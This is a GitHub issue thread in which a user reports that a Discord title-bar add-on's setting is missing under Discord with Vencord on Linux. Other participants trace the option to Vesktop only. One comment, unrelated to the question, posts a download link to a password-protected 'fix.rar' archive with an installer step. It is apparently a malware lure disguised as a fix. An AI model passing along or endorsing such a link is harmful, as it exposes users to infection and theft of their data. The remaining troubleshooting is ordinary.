### ISSUE TITLE
Doesn't appear to work with latest version on Vencord/Discord on Linux Wayland

### ISSUE THREAD

**Issue by weavejester** [nannoda/gnome-discord-titlebar#1]
Thanks for your work on this, but I'm having some trouble getting this to work. The README instructions for Linux say:

> Under User Interface, enable the Discord Title Bar option

But there is no such setting, at least on the latest download of Vencord:

![image](https://github.com/user-attachments/assets/c73fe8c9-b36b-4d05-b7ea-1333b6093a6a)

I did try using the "Disable the window frame" option, but while this removes the window decoration, it doesn't add a custom title bar or close, minimize, maximize icons.

![image](https://github.com/user-attachments/assets/8c96eaa1-5f6d-42c6-a2b9-9c4005914cc9)

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yamada-sexta** [comment]
It is under Vesktop Settings, not Vencord setting. It is kinda confusing.
![image](https://github.com/user-attachments/assets/2cfb2150-6961-4d33-8f8f-d4507d6909e0)

**Comment by weavejester** [comment]
That's weird. I don't have that option:

![image](https://github.com/user-attachments/assets/fe9a4f53-9108-4f83-a54c-29ef548a0660)

Perhaps Vencord didn't install properly. I'll try re-installing.

**Comment by yamada-sexta** [comment]
Are you using the flatpak version?

**Comment by weavejester** [comment]
Yes, I'm using the flatpak Discord, and the Vencord installer from https://vencord.dev/download/

**Comment by yamada-sexta** [comment]
I am running vencord on fedora, and I installed it directly from flatpak (not with the installer script).
https://flathub.org/apps/dev.vencord.Vesktop 
And here is the version that I am running on:
```
stable 322113 (ef53d56) Build Override: N/A
Vencord 6659f2c (Vesktop v1.5.3)
Electron 31.1.0
Chromium 126.0.6478.114
```
Do you mind share your version?

**Comment by weavejester** [comment]
I'm unsure how to get that information. There doesn't seem to be an obvious version report.

However, I think I may know where I'm going wrong. I have the normal flatpak Discord with Vencord installed via its install script. I don't have Vesktop installed, and my guess is that "Vesktop Settings" is only available to Vesktop, not Discord+Vencord.

I'll try installing Vesktop from flatpak and see what happens.

**Comment by weavejester** [comment]
I can confirm Vesktop works, and base Discord+Vencord doesn't appear to.

Unfortunately Vesktop has some font size issues for me, so I can't use it until I work out how to fix that. But the title bar works well enough now.
